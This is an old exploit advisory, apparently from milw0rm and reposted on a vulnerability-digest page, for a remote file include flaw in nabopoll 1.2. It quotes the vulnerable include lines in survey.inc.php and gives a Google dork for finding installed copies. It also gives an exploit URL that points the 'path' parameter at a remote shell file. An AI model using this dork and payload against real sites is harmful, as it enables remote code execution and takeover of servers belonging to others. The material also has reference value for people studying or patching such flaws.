Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

CodeAvalanche News SQL Injection

nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities

From:	Cr@zy_King <crazy_king_(at)_turkusev.com>
Date:	15.02.2007
Subject:	nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability

By Cr@zy_King

crazy_king@eno7.org

Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File .nclude | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present

# milw0rm.com [2007-02-15]